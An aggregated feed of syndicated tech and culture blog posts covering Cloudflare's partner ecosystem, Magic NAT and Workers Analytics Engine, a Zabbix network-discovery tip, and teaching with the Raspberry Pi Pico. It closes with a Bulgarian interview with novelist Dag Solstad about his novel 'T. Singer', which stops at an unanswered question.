Our growing Developer Platform partner ecosystem

“With this integration, our customers can work more efficiently and cross-functionally with their teams. Marketing teams can update Contentful directly to automatically trigger deployments without relying on their developers to update any of their code base, which results in a better, more productive experience for all teams involved.”
— Jeff Blattel, Director of Technical Partnerships at Contentful

“We’re delighted to partner with Cloudflare and excited by this new release from Cloudflare Pages. At Sanity, we care deeply about people working with content on our platform. Cloudflare’s new deploy hooks allow developers to automate builds for static sites based on content changes, which is a huge improvement for content creators. Combining these with structured content and our GROQ-powered Webhooks, our customers can be strategic about when these builds should happen. We’re stoked to be part of this release and can’t wait to see what the community will build with Sanity and Cloudflare!”
— Even Westvang, Co-founder, Sanity.io

“At Strapi, we’re excited about this partnership with Cloudflare because it enables developers to abstract away the complexity of deploying changes to production for content teams. By using the Deploy Hook for Strapi, everyone can push new content and updates quickly and autonomously.”
— Pierre Burgy, CEO, Strapi.io

Database partners:
We’ve consistently heard a common theme: developers want to build more of their applications on Workers. In addition to having our own first-party solutions such as Workers KV, Durable Objects, R2 and D1 we have also partnered with best-of-breed data companies to bring their capabilities to the Workers developer platform and open up a wide variety of use cases on Workers.

Our growing Developer Platform partner ecosystem

“With Cloudflare and Macrometa, developers can now build and deliver powerful and compelling data-driven experiences in a way that the centralized clouds will never be able to. The world deserves a better cloud – an edge cloud.”
— Chetan Venkatesh, Co-founder/CEO, Macrometa

“The integration of Cloudflare workers with Fauna allows our joint customers to simply and cost effectively bring both data and logic to the edge. Fauna was developed from the ground up as a globally distributed, serverless database and when combined with Cloudflare Workers serverless compute fabric provides developers with a simple, yet powerful abstraction over the complexities of distributed infrastructure.”
— Evan Weaver, Co-founder/CTO, Fauna

Debugging, analytics, troubleshooting partners:
Troubleshooting is key in the developer workflow. True observability means having an end-to-end view of an entire system, inclusive of third-party integrations and deployments. By combining real-time data with data from other logging and monitoring endpoints, customers can get robust, instant feedback into how their website and how applications are performing all in one place.

Our growing Developer Platform partner ecosystem

“Teams using Cloudflare Workers with Splunk Observability get full-stack visibility and contextualized insights from metrics, traces and logs across all of their infrastructure, applications and user transactions in real-time and at any scale. With Splunk Observability, IT and DevOps teams now have a seamless and analytics-powered workflow across monitoring, troubleshooting, incident response and optimization. We’re excited to partner with Cloudflare to help developers and operations teams slice through the complexity of modern applications and ship code more quickly and reliably.”
— Jeff Lo, Director of Product Marketing, Splunk

“Maintaining a strong security posture means ensuring every part of your toolchain is being monitored – from the datacenter/VPC, to your edge network, all the way to your end users. With Datadog’s partnership with Cloudflare, you get edge computing logs alongside the rest of your application stack’s telemetry – giving you an end to end view of your application’s health, performance and security.”
— Michael Gerstenhaber, Sr. Director, Datadog

“Reduce downtime and solve customer-impacting issues faster with an integrated observability platform for all of your Cloudflare data, including its Workers serverless platform. By using Cloudflare Workers with Sumo Logic, customers can seamlessly correlate system issues measured by performance monitoring, gain deep visibility provided by logging, and monitor user experience provided by tracing and transaction analytics.”
— Abelardo Gonzalez, Director of Product Marketing, Sumo Logic

“Monitoring your Cloudflare Workers serverless environment with New Relic lets you deliver serverless apps with confidence by rapidly identifying when something goes wrong and quickly pinpointing the problem—without wading through millions of invocation logs. Monitor, visualize, troubleshoot, and alert on all your Workers apps in a single experience.”
— Raj Ramanujam, Vice President, Alliances and Channels, New Relic

“With Cloudflare Workers and Sentry, software teams immediately have the tools and information to solve issues and learn continuously about their code health instead of worrying about systems and resources. We’re thrilled to partner with Cloudflare on building technologies that make it easy for developers to deploy with confidence.”
— Elain Szu, Vice President of Marketing, Sentry

“Honeycomb is excited to partner with Cloudflare as they build an ecosystem of tools that support the full lifecycle of delivering successful apps. Writing and deploying code is only part of the equation. Understanding how that code performs and behaves when it is in the hands of users also determines success. Cloudflare and Honeycomb together are shining the light of observability all the way to the edge, which helps technical teams build and operate better apps.”
— Charity Majors, CTO & Co-Founder, Honeycomb

And we are just getting started. Over the last 10 years, Cloudflare has built one of the fastest, most reliable, and most secure networks in the world. We are now enabling developers to build on that network using best in class products seamlessly. Visit our Developer Platform Partner Ecosystem directory for more information on integrations.

If you’re interested in learning more about how to partner with us, reach out to us by filling out this quick form.

Magic NAT: everywhere, unbounded, and lower cost

Post Syndicated from Annika Garbers original https://blog.cloudflare.com/magic-nat/

Magic NAT: everywhere, unbounded, and lower cost

Magic NAT: everywhere, unbounded, and lower cost

Network Address Translation (NAT) is one of the most common and versatile network functions, used by everything from your home router to the largest ISPs. Today, we’re delighted to introduce a new approach to NAT that solves the problems of traditional hardware and virtual solutions. Magic NAT is free from capacity constraints, available everywhere through our global Anycast architecture, and operates across any network (physical or cloud). For Internet connectivity providers, Magic NAT for Carriers operates across high volumes of traffic, removing the complexity and cost associated with NATing thousands or millions of connections.

What does NAT do?

The main function of NAT is in its name:  NAT is responsible for translating the network address in the header of an IP packet from one address to another – for example, translating the private IP 192.168.0.1 to the publicly routable IP 192.0.2.1. Organizations use NAT to grant Internet connectivity from private networks, enable routing within private networks with overlapping IP space, and preserve limited IP resources by mapping thousands of connections to a single IP. These use cases are typically accomplished with a hardware appliance within a physical network or a managed service delivered by a cloud provider.

Let’s look at those different use cases.

Allowing traffic from private subnets to connect to the Internet

Resources within private subnets often need to reach out to the public Internet. The most common example of this is connectivity from your laptop, which might be allocated a private address like 192.168.0.1, reaching out to a public resource like google.com. In order for Google to respond to a request from your laptop, the source IP of your request needs to be publicly routable on the Internet. To accomplish this, your ISP translates the private source IP in your request to a public IP (and reverse-translates for the responses back to you). This use case is often referred to as public NAT, performed by hardware or software acting as a “NAT gateway.”

Magic NAT: everywhere, unbounded, and lower cost
Public NAT translates private IP addresses to public ones so that traffic from within private networks can access the Internet.

Users might also have requirements around the specific IP addresses that outgoing packets are NAT’d to. For example, they may need packets to egress from only one or a small subset of IPs so that the services they’re reaching out to can positively identify them – e.g. “only allow traffic from this specific source IP and block everything else.” They might also want traffic to NAT to IPs that accurately reflect the source’s geolocation, in order to pass the “pizza test”: are the results returned for the search term “pizza near me” geographically relevant? These requirements can increase the complexity of a customer’s NAT setup.

Enabling communication between private subnets with overlapping IP space

NATs are also used for routing traffic within fully private networks, in order to enable communication between resources with overlapping IP space. One example: imagine that you’re an IT architect at a retail company with a hundred geographically distributed store locations and a central data center. To make your life easier, you want to use the same IP address management scheme for all of your stores – e.g. host all of your printers on 10.0.1.0/24, point of sale devices on 10.0.2.0/24, and security cameras on 10.0.3.0/24. These devices need to reach out to resources hosted in your data center, which is also on your private network. The challenge: if multiple devices across your stores have the same source IP, how do return packets from your data center get back to the right device? This is where private NAT comes in.

Magic NAT: everywhere, unbounded, and lower cost
Private NAT translates IPs into a different private range so that devices with overlapping IP space can communicate with each other.

A NAT gateway sitting in a private network can enable connectivity between overlapping subnets by translating the original source IP (the one shared by multiple resources) to an IP in a different range. This can enable communication between mirrored subnets and other resources (like in our store → datacenter example), as well as between the mirrored subnets themselves – e.g. if traffic needed to flow between our store locations directly, such as a VoIP call from one store to another.

Conserving IP address space

As of 2019, the available pool of allocatable IPv4 space has been exhausted, making addresses a limited resource. In order to conserve their IPv4 space while the industry slowly transitions to IPv6, ISPs have adopted carrier-grade NAT solutions to map multiple users to a single IP, maximizing the mileage of the space they have available. This uses the same mechanisms for address translation we’ve already described, but at a large scale – ISPs need to deploy devices that can handle thousands or millions of concurrent connections without impacting traffic performance.

Magic NAT: everywhere, unbounded, and lower cost

Challenges with existing NAT solutions

Today, users accomplish the use cases we’ve described with a physical appliance (often a firewall) or a virtual appliance delivered as a managed service from a cloud provider. These approaches have the same fundamental limitations as other hardware and virtualized hardware solutions traditionally used to accomplish most network functions.

Geography constraints

Physical or virtual devices performing NAT are deployed in one or a few specific locations (e.g. within a company’s data center or in a specific cloud region). Traffic may need to be backhauled out of its way through those specific locations to be NAT’d. A common example is the hub and spoke network architecture, where all Internet-bound traffic is backhauled from geographically distributed locations to be filtered and passed through a NAT gateway to the Internet at a central “hub.” (We’ve written about this challenge previously in the context of hardware firewalls.)

Managed NAT services offered by cloud providers require customers to deploy NAT gateway instances in specific availability zones. This means that if customers have origin services in multiple availability zones, they either need to backhaul traffic from one zone to another, incurring fees and latency, or deploy instances in multiple zones. They also need to plan for redundancy – for example, AWS recommends configuring a NAT gateway in every availability zone for “zone-independent architecture.”

Capacity constraints

Each appliance or virtual device can only support up to a certain amount of traffic, and higher supported traffic volumes usually come at a higher cost. Beyond these limits, users need to deploy multiple NAT instances and design mechanisms to load balance traffic across them, adding additional hardware and network hops to their stack.

Cost challenges

Physical devices that perform NAT functionality have several costs associated – in addition to the upfront CAPEX for device purchases, organizations need to plan for installation, maintenance, and upgrade costs. While managed cloud services don’t carry the same cost line items of traditional hardware, leading providers’ models include multiple costs and variable pricing that can be hard to predict. A combination of hourly charges, data processing charges, and data transfer charges can lead to surprises at the end of the month, especially if traffic experiences momentary spikes.

Hybrid infrastructure challenges

More and more customers we talk to are embracing hybrid (datacenter/cloud), multi-cloud, or poly-cloud infrastructure to diversify their spend and leverage the best of breed features offered by each provider. This means deploying separate NAT instances across each of these networks, which introduces additional complexity, management overhead, and cost.

Magic NAT: everywhere, unbounded, cross-platform, and predictably priced

Over the past few years, as we’ve been growing our portfolio of network services, we’ve heard over and over from customers that you want an alternative to the NAT solutions currently available on the market and a better way to address the challenges we described. We’re excited to introduce Magic NAT, the latest entrant in our “Magic” family of services designed to help customers build their next-generation networks on Cloudflare.

How does it work?

Magic NAT is built on the foundational components of Cloudflare One, our Zero Trust network-as-a-service platform. You can follow a few simple steps to get set up:

  1. Connect to Cloudflare. Magic NAT works with all of our network-layer on-ramps including Anycast GRE or IPsec, CNI, and WARP. Users set up a tunnel or direct connection and route privately sourced traffic across it; packets land at the closest Cloudflare location automatically.
  2. Upgrade for Internet connectivity. Users can enable Internet-bound TCP and UDP traffic (any port) to access resources on the Internet from Cloudflare IPs.
  3. (Optional) Enable dedicated egress IPs. Available if you need traffic to egress from one or multiple dedicated IPs rather than a shared pool. Dedicated egress IPs may be useful if you interact with services that “allowlist” specific IP addresses or otherwise care about which IP addresses are seen by servers on the Internet.
  4. (Optional) Layer on security policies for safe access. Magic NAT works natively with Cloudflare One security tools including Magic Firewall and our Secure Web Gateway. Users can add policies on top of East/West and Internet-bound traffic to secure all network traffic with L3 through L7 protection.

Address translation between IP versions will also be supported, including 4to6 and 6to4 NAT capabilities to ensure backwards and forwards compatibility when clients or servers are only reachable via IPv4 or IPv6.

Magic NAT: everywhere, unbounded, and lower cost

Anycast: Magic NAT is everywhere, automatically

With Cloudflare’s Anycast architecture and global network of over 275 cities across the world, users no longer need to think about deploying NAT capabilities in specific locations or “availability zones.” Anycast on-ramps mean that traffic automatically lands at the closest Cloudflare location. If that location becomes unavailable (e.g. for maintenance), traffic fails over automatically to the next closest – zero configuration work from customers required. Failover from Cloudflare to customer networks is also automatic; we’ll always route traffic across the healthiest available path to you.

Scale: Magic NAT leverages Cloudflare’s entire network capacity

Cloudflare’s global capacity is at 141 Tbps and counting, and automated traffic management systems like Unimog allow us to take full advantage of that capacity to serve high volumes of traffic smoothly. We absorb some of the largest DDoS attacks on the Internet, process hundreds of Gbps for customers through Magic Firewall, and provide privacy for millions of user devices across the world – and Magic NAT is built with this scale in mind. You’ll never need to provision and load balance across multiple instances or worry about traffic throttling or congestion again.

Cost: no more hardware costs and no surprises

Magic NAT, like our other network services, is priced based on the 95th percentile of clean bandwidth for your network: no installation, maintenance, or upgrades, and no surprise charges for data transfer spikes. Unlike managed services offered by cloud providers, we won’t charge you for traffic twice. This means fair, predictable billing based on what you actually use.

Hybrid and multi-cloud: simplify networking across environments

Today, customers deploying NAT across on-prem environments and cloud properties need to manage separate instances for each network. As with Cloudflare’s other products that provide an overlay across multiple environments (e.g. Magic Firewall), we can dramatically simplify this architecture by giving users a single place for all their traffic to NAT through regardless of source/origin network.

Summary

Traditional NAT solutions Magic NAT
Location-dependent
Deploy physical or virtual appliances in one or more locations; additional cost for redundancy.
Anycast
No more planning availability zones. Magic NAT is everywhere and extremely fault-tolerant, automatically.
Capacity-limited
Physical and virtual appliances have upper limits for throughput; need to deploy and load balance across multiple devices to overcome.
Scalable
No more planning for capacity and deploying multiple instances to load balance traffic across – Magic NAT leverages Cloudflare’s entire network capacity, automatically.
High (hardware) and/or unpredictable (cloud) cost
CAPEX plus installation, maintenance, and upgrades or triple charge for managed cloud service.
Fairly and predictably priced
No more sticker shock from unexpected data processing charges at the end of the month.
Tied to physical network or single cloud
Need to deploy multiple instances to cover traffic flows across the entire network.
Multi-cloud
Simplify networking across environments; one control plane across all of your traffic flows.

Learn more

Magic NAT is currently in beta, translating network addresses globally for a variety of workloads, large and small. We’re excited to get your feedback about it and other new capabilities we’re cooking up to help you simplify and future-proof your network – learn more or contact your account team about getting access today!

Introducing Workers Analytics Engine

Post Syndicated from Jon Levine original https://blog.cloudflare.com/workers-analytics-engine/

Introducing Workers Analytics Engine

Introducing Workers Analytics Engine

Today we’re excited to introduce Workers Analytics Engine, a new way to get telemetry about anything using Cloudflare Workers. Workers Analytics Engine provides time series analytics built for the serverless era.

Workers Analytics Engine uses the same technology that powers Cloudflare’s analytics for millions of customers, who generate 10s of millions of events per second. This unique architecture provides significant benefits over traditional metrics systems – and even enables our customers to build analytics for their customers.

Why use Workers Analytics Engine

Workers Analytics Engine can be used to get telemetry about just about anything.

Our initial motivation for building Workers Analytics Engine was to help internal teams at Cloudflare better understand what’s happening in their Workers. For example, one early internal customer is our R2 storage product. The R2 team is using the Analytics Engine to measure how many reads and writes happen in R2, how many users make these requests, how many bytes are transferred, how long the operations take, and so forth.

After seeing quick adoption from internal teams at Cloudflare, we realized that many customers could benefit from using this product.

For example, Workers Analytics Engine can also be used to build custom security rules. You could use it to implement something like fail2ban, a program that can ban malicious traffic. Every time someone logs in, you could record information like their location and IP. On subsequent logins, you could query the rate of login attempts from these attackers, and block them if they’ve attempted to sign in too many times in a given period.

Workers Analytics Engine can even be used to track things in the world that have nothing (yet!) to do with Workers. For example, imagine you have a network of IoT sensors that connect to the Internet to report weather and air quality data, like temperature, air pressure, wind speed, and PM2.5 pollution. Using Workers Analytics Engine, you could deploy a Worker in just a few minutes that collects these reports, and then query and visualize the data using our analytics APIs.

How to use Workers Analytics Engine

There are three steps to get started with Workers Analytics Engine:

  1. Configure your analytics using Wrangler
  2. Write data using the Workers Runtime API
  3. Query your data using our SQL or GraphQL API.

Configuring Workers Analytics Engine in Wrangler

To start using Workers Analytics Engine, you first need to configure it in Wrangler. This is done by creating a binding in wrangler.toml.

[analytics_engine]
bindings = [
    { name = "WEATHER" }
]

Your analytics can be named after the event in the world that they represent. For example, readings from our weather sensor above might be named “WEATHER.”

For our current beta release, customers may only create one binding at a time. In the future, we plan to enable customers to define multiple bindings, or even define them on-the-fly from within the Workers runtime.

Writing data from the Workers runtime

Once a binding is declared in Wrangler, you get a new environment variable in the Workers runtime that represents your Analytics Engine. This variable has a method, writeDataPoint(). A “data point” is a structured event which consists of a vector of labels and a vector of metrics.

A metric is just a “number” type field that can be aggregated in some way – for example, it could be summed, averaged, or quantiled. A label is a “string” type field that can be used for grouping or filtering.

For example, suppose you are collecting air quality samples. Each data point would represent a reading from your weather sensor. Metrics might include numbers like the temperature or air pressure reading. The labels could include the location of the sensor and the hardware identifier of the sensor.

Here’s what this looks like in code:

  async fetch(request: Request, env) {
    env.WEATHER.writeDataPoint({
      labels: ["Seattle", "USA", "pro_sensor_9000”],
      metrics: [25, 0.5]
    });
    return new Response("OK!");
  }

In our initial version, developers are responsible for providing fields in a consistent order, so that they have the same semantics when querying. In a future iteration, we plan to let developers name their labels and metrics in the binding, and then use these names when writing data points in the runtime.

Querying and visualizing data

To query your data, Cloudflare provides a rich SQL API. For example:

SELECT label_1 as city, avg(metric_2) as avg_humidity
FROM WEATHER
WHERE metric_1 > 0
ORDER BY avg_humidity DESC
LIMIT 10

The results would show you the top 10 cities that had the highest average humidity readings when the temperature was above 0.

Note that, for our initial version, labels and metrics are accessed via names that have 1-based indexing. In the future, when we let developers name labels and metrics in their binding, these names will also be available via the SQL API.

Workers Analytics Engine is optimized for powering time series analytics that can be visualized using tools like Grafana. Every event written from the runtime is automatically populated with a timestamp field. This makes it incredibly easy to make time series charts in Grafana:

Introducing Workers Analytics Engine

The macro $timeSeries simply expands to intDiv(toUInt32(timestamp), 60) * 60 * 1000 — i.e. the timestamp rounded to the nearest minute (as defined in our \$step parameter)  and converted into milliseconds. Grafana also provides \$timeFilter which can be changed at the grafana dashboard level. We could easily add another series here by just “grouping” on another field like “city”.

Data can also be queried using our GraphQL API. At this time, the GraphQL API only supports querying total counts for each named binding.

Finally, the Cloudflare dashboard also provides a high-level count of the total number of data points seen for each binding. In the future, we plan to offer rich analytical abilities through the dashboard.

How is this different from traditional metrics systems?

Many developers are familiar with metrics systems like Prometheus. We built Workers Analytics Engine based on our experience providing analytics for millions of Cloudflare customers. Writing structured event logs and querying them using a relational database model is very different from writing metrics – but it’s also much more powerful.

Here are some of the benefits of our model, compared with metrics systems:

  • Unlimited cardinality of label values: In a traditional metrics system, like Prometheus, every time you add a new label value, under the hood you are actually adding a new metric. If you have multiple labels for one data point, this can rapidly increase the number of metrics. Nearly everyone using a metrics system runs into challenges with cardinality. For example, you may start by including a “customer ID” in a label – but what happens when you have thousands or millions of customers? In contrast, when using Workers Analytics Engine, every label value is stored independently – so every data point can have unique label values with no problem.
  • Low latency reporting: Pull-based metrics systems must check for new metrics at some fixed interval, known as a scrape interval. Commonly this is set to one minute or longer – and this is the absolute fastest that your data can be collected. With Workers Analytics Engine, we can report on new data points within a few seconds.
  • Fast queries at any timescale: Everyone who uses Prometheus knows what happens when you expand that range selector in Grafana to change from looking back 30 minutes to seven days… you wait, and you’re lucky if you get any results at all. Whole new pieces of software exist just for the challenge of storing Prometheus metrics long-term. In contrast, Workers Analytics Engine is superfast at querying anything from the last five minutes of data to the last seven days. Look for yourself to see!

And of course, Workers Analytics Engine runs on Cloudflare’s global network. So rather than worrying about running your own Prometheus server, setting up Thanos, and closely tracking cardinality, you can just write data and query it using our SQL API.

What’s next

Today we’re introducing a closed beta for Workers Analytics Engine. You can join the waitlist by signing up here. We already have many teams at Cloudflare happily using this and would love to get your feedback at this early stage, as we are quickly adding new functionality.

We have an ambitious roadmap ahead of us. One critical use case we plan to support is building analytics and usage-based billing for your customers – so if you’re a platform who is looking to build analytics into your product, we’d love to talk to you!

And of course, if this sounds fun to work on, we’re hiring engineers on the Data team to work in San Francisco, London, or remote locations!

Handy Tips #29: Discovering hosts and services with network discovery

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/handy-tips-29-discovering-hosts-and-services-with-network-discovery/20484/

Automate host creation and monitoring with Zabbix network discovery.

Creating hosts for a large number of monitoring endpoints can become a menial and time-consuming task. It is important to provide the end-users with the tools to automate such tasks to create and start monitoring hosts based on a user-defined set of rules and conditions.

Automate host onboarding and offboarding with Zabbix network discovery:

  • Discover monitoring endpoints and services in user defined IP ranges
  • Define a set of services that should be discovered

  • Provide custom workflows based on the received values
  • Onboard or offboard hosts based on the discovery status

Check out the video to learn how to discover your monitoring endpoints with Zabbix network discovery.

How to configure Zabbix network discovery:

  1. Navigate to ConfigurationDiscovery
  2. Press the Create discovery rule button service button
  3. Provide the discovery rule name, IP range and update interval
  4. Define discovery checks
  5. Press the Add button
  6. Navigate to ​​​​​​​ConfigurationActionsDiscovery actions
  7. Press the Create action button
  8. Provide the action name and action conditions
  9. Navigate to the Operations tab
  10. Define operations to assign templates and host groups
  11. Press the Add button
  12. Wait for the services to be discovered
  13. Navigate to MonitoringDiscovery and confirm the discovery status
  14. Confirm that the hosts have been created in Zabbix

Tips and best practices
  • A single discovery rule will always be processed by a single Discoverer process
  • Every check of a service and a host generates one of the following events: Host or service – Discovered/Up/Lost/Down
  • The hosts discovered by different proxies are always treated as different hosts
  • A host is also added, even if the Add host operation is missing, if you select operations resulting in actions on a host, such as enable/disable/add to host group/link template

The post Handy Tips #29: Discovering hosts and services with network discovery appeared first on Zabbix Blog.

Teaching with Raspberry Pi Pico in the computing classroom

Post Syndicated from Dan Elwick original https://www.raspberrypi.org/blog/raspberry-pi-pico-classroom-physical-computing/

Raspberry Pi Pico is a low-cost microcontroller that can be connected to another computer to be programmed using MicroPython. We think it’s a great tool for exploring physical computing in classrooms and coding clubs. Pico has been available since last year, amid school closures, reopenings, isolation periods, and restrictions for students and teachers. Recently, I spoke to some teachers in England about how their reception of Raspberry Pi Pico, and how they have found using it to teach physical computing to their learners.

A student uses a Raspberry Pi Pico in the computing classroom.

This blog post is adapted from issue 18 of Hello World, our free magazine written by computing educators for computing educators.

Extra-curricular engagement

At secondary schools, a key use of Raspberry Pi Pico was in teacher-led lunchtime or after-school clubs. One teacher from a girls’ secondary school in Liverpool described how he introduced it to his Women in Tech club, which he runs for 11- to 12-year-old students for half an hour per week at lunchtime. As this teacher has free reign over the club content and a personal passion for Raspberry Pi, his eventual aim for the club participants was to build a line-following car using Pico.

On a wooden desktop, electronic components, a Raspberry Pi Pico, and a motor next to a keyboard.

The group started by covering the basics of Pico, such as connecting it with a breadboard and making LEDs flash, using our ‘Getting started with Raspberry Pi Pico’ project guide. The teacher described how walking into a room with Picos and physical computing kits grabs students’ attention: “It’s massively more engaging than programming Python on a screen… They love the idea of building something physical, like a car.” He has to remind them that phones aren’t allowed at school, as they’re keen to take photos of the flashing lights to show their parents. His overall verdict? “Once the software had been installed, [Picos are] just plug and play. As a tool in school, it gives you something physical, enthuses interest in the subject. If it gets just one person choosing the subject, who wouldn’t have done otherwise, then job done.”

“If it gets just one person choosing the subject, who wouldn’t have done otherwise, then job done.”

Teacher at a Liverpool girls’ secondary school

Another teacher from a school in Hampshire used Picos at an after-school club with students aged 13 to 15. After about six sessions of less than 50 minutes last term, the students have almost finished building motorised buggies. The first two sessions were spent familiarising students with the Picos, making LEDs flash, and using sensors. In the next four sessions, the students made their way through the Pico-focused physical computing unit from our Teach Computing Curriculum. The students worked in pairs, and initially some learners had trouble getting the motors to turn the wheels on their buggies. Rather than giving them the correct code, the teacher gave them duplicate sets of the hardware and suggested that they test each piece in turn to ‘debug’ the hardware. Thus the students quickly worked out what they needed to do to make the wheels turn.

A soldered Raspberry Pi Pico on a breadboard.

For non-formal learning settings such as computing and coding clubs, we’ve just released a six-project learning path called ‘Introduction to Raspberry Pi Pico’ for beginner digital makers. You can check out the path directly, or learn more about how we’ve designed it to encourage learners’ independence.

Reinforcing existing computing skills

Another key theme that came through in my conversations with teachers was how Raspberry Pi Pico can be used to reinforce learners’ existing computing skills. One teacher I interviewed, from a school in Essex, has been using Picos to teach computing to 12- to 14-year-olds in class, and talked about the potential for physical computing as a pedagogical tool for recapping topics that have been covered before. “If [physical computing] is taught well, it enhances students’ understanding of programming. If they just copy code from the board, it becomes about the kit and not how you solve a problem, it’s not as effective at helping them develop their computational thinking. Teaching Python on Pico really can strengthen existing understanding of using Python libraries and subroutines, as well as passing subroutine arguments.”

“If [physical computing] is taught well, it enhances students’ understanding of programming.”

Teacher at an Essex secondary school

Another teacher I spoke to, working at a Waterlooville school and relatively new to teaching, talked about the benefits of using Pico to teach Python: “It takes some of the anxiety away from computing for some of the younger students and makes them more resilient. They can be wary of making mistakes, and see them as a hurdle, but working towards a tangible output can help some students to see the value of learning through their mistakes.”

Raspberry Pi Pico attached with jumper wires to a purple LED.

This teacher was keen for his students to get a sense of the variety of jobs that are available in the computing sector, and not just in software. He explained how physical computing can demonstrate to students how you can make inputs, outputs, and processing very real: “Give students a Pico and make them thirsty about what they could do with it — the device allows them to interact with it and work out how to bend it to what they want to do. You can be creative in computing without just writing code, you can capture information and output it again in a more useful way.”

“Working towards a tangible output can help some students to see the value of learning through their mistakes.”

Teacher at a Waterlooville school

One of the teachers we spoke to was initially a bit cynical about Pico, but had a much better experience of using it in the classroom than expected: “It’s not such a big progression from block-based microcontrollers to Pico — it could be a good stepping stone between, for example, a micro:bit and a Raspberry Pi computer.”

Why not try out Raspberry Pi Pico in your classroom or club? It might be the engagement booster you’ve been looking for!  

Top teacher tips for activities with Raspberry Pi Pico

  • Prepare to install Thonny (the software we recommend to program Pico) on your school’s or venue’s IT systems, and ask your IT technician for support.
  • It takes time to unpack devices, connect them, and pack them back up again. Build this time into your plan!

Free learning resources for using Raspberry Pi Pico in your classroom or club

Teachers at state schools in England can borrow physical computing kits with class sets of Raspberry Pi Picos from their local Computing Hub. We’ve made these kits available through our work as part of the National Centre for Computing Education. The Pico kit is perfect for teaching the Pico-focused physical computing unit from our Teach Computing Curriculum.

Qualified US-based educators can still get their hands on 1 of 1000 free Raspberry Pi Pico hardware kits if they sign up to our free course Design, build, and code a rover with Raspberry Pi Pico. This course shows you how to introduce Pico in your classroom. We’ve designed the course on the Pathfinders Online Institute platform, specifically for US-based educators, thanks to our partners at Infosys Foundation USA. These Raspberry Pi Pico kits are also available at PiShop.us.

For non-formal learning settings, such as Code Clubs and CoderDojos, we’ve created a six-project learning path: ‘Introduction to Raspberry Pi Pico’. This path is for beginner digital makers to follow and create Pico projects, all the while learning the skills to independently design, code, and build their own projects. All of the components for the path are available as a kit from Pimoroni.

The post Teaching with Raspberry Pi Pico in the computing classroom appeared first on Raspberry Pi.

Т. Сингер – анонимният самотник. Непубликувано интервю на Марин Бодаков с Даг Сулста

Post Syndicated from Марин Бодаков original https://toest.bg/dag-solstad-interview/

Това интервю можеше да има продължение…

С тези думи започва писмото на Даря Хараланова от издателство „Аквариус“ до нас. Към писмото тя беше прикачила едно интервю, което преди точно една година Марин Бодаков подготвяше за „Тоест“, но така и не пристигна в редакцията. Ето защо: 

В началото на 2021 г., веднага след като издадохме „Т. Сингер“ на Даг Сулста, Марин се свърза с мен и ме помоли да му оставя един екземпляр в обичайната ни „пощенска кутия“ – „Български книжици“ в София. Сулста (р. 1941) е многократно награждаван норвежки романист, есеист, драматург и автор на над 30 книги, но досега не беше излизал на български. Марин искаше да включи „Т. Сингер“ в колонката си „По буквите“.

Скоро след прочитането на романа обаче Марин ми поръча да попитам Даг Сулста дали ще се съгласи на интервю. Тъй като контактът с него беше възможен само през литературната агенция, се наложи да почакаме. Освен всичко 80-годишният Сулста не използва имейл, поради което от агенцията трябваше да разпечатат на хартия въпросите на Марин, да ги изпратят на писателя по обикновената поща и пак по нея да изчакат отговорите, да ги наберат на компютър и да ги изпратят обратно на нас.

Получих отговорите в началото на октомври, месец след като Марин внезапно ни напусна. Оттогава държа този файл в компютъра си…

И ето че сега задочният разговор между Марин Бодаков и Даг Сулста най-после стигна до нас благодарение на усилията на литературни агенти и издатели, на интернет и норвежките пощи. Насладете му се, а следващата събота, на 21 май, очаквайте ревю от Стефан Иванов на романа „Т. Сингер“ в книжната ни рубрика „На второ четене“.


На кои литературни персонажи от европейската литература е сродник Вашият герой Сингер?

Не съм мислил за това. А и не искам да мисля. Но многократно съм казвал, в интервюта и на други места, че от книгите ми трябва да мирише на литература, не на жив живот. С други думи, книгите ми представляват фикция, те са съчинени, съчинени от мен. Тоест всички романи, които съм изчел през живота си, може да се появят в творчеството ми под формата на придобит опит.

В началото на романа много внимателно осмисляте вината и срама като двигатели на житейските избори на Сингер. Какво щеше да изгуби литературата, ако бяхме описали историята на Вашия герой/антигерой в психиатрични термини – като паник атаки или натрапливи спомени?

Не виждам нищо лошо в избора на подобен прочит. На читателя е позволено всичко, дори и да се противопоставя на писателския замисъл. Но в този случай бих предпочел да не вземам отношение по въпроса. Избягвам да чета за това – не е трудно, предвид колко оглушах с времето и от колко много неща ме пощадява старостта ми, а в интернет изобщо не влизам.

Дали Сингер не спазва съвета на Епикур „Живей незабелязано“? Може ли днес човек да бъде щастлив, ако предпочете неизвестността?

Не бих определил Сингер като щастлив, но той сам е избрал да води живота, който води и който толкова цени, макар това да е един невъзможен и несъстоятелен живот. Допускам, че повечето разумни хора в наши дни биха оценили съществуването му точно така – или поне разумните хора от 2000 г., когато се развива краят на романа.

Къде изчезва радостта във всекидневието на Сингер? И защо?

Не знам кога точно изчезва щастието от живота на Сингер, защото той никога не се е чувствал щастлив, освен може би в зачатъка на брака си с Мерете Сетре, но после тя загива в катастрофа, а по това време бракът им вече е започнал да се разпада и двамата са решили да се разведат. Но ето че тя умира и Сингер остава сам с дъщеричката на Мерете Сетре – Исабела, в редовата къща в Нутоден. Решението му да поеме грижите за Исабела като за собствено дете е повратен момент в романа. Тогава щастието му вече го е напуснало, но в този момент настъпва решаващият обрат в живота му.

Помогнете на читателя: как да тълкуваме отказа на Сингер от писателството в полза на библиотекарството? Това въпрос на страх ли е, или въпрос на смелост?

Младият Сингер мечтае да стане писател, точно като мен. Но за разлика от мен, той не успява в начинанието си. Записва се в библиотекарското училище на около 28 години, завършва го на около 30–31 години и веднага след това бива назначен в библиотеката в Нутоден. С пълно основание можем да кажем, че се предава, претърпял е сериозно поражение, нещо недотам необичайно за един млад човек. Но както повечето от нас, и той се изправя и извлича максимума от поражението си – при това не без каква да е жизнерадост, въпреки меланхоличния си нрав, който никога не го напуска и по който той се родее с мен. Дали решението му е породено от страх, или от смелост, не се наемам да кажа.

Съдейки по опита на Сингер, има ли смисъл човек изобщо да опознава себе си?

Сингер се познава добре, той има задълбочен поглед върху собствените си действия и причините за тях. Дали има смисъл човек да се опознава? Строго погледнато, не знам, но за Сингер себепознанието е от значение, защото му позволява да живее порядъчно. Той поема отговорността за дъщеричката на загиналата си съпруга, заедно с нея напуска Нутоден и започва едно анонимно съществуване в столицата Осло. В крайна сметка нима за един меланхоличен човек, който не вижда фундаментален смисъл в битието, представата за порядъчен живот, изпълнен с отговорни действия, не се изчерпва тъкмо с това?

Какво от себе си вградихте в Сингер?

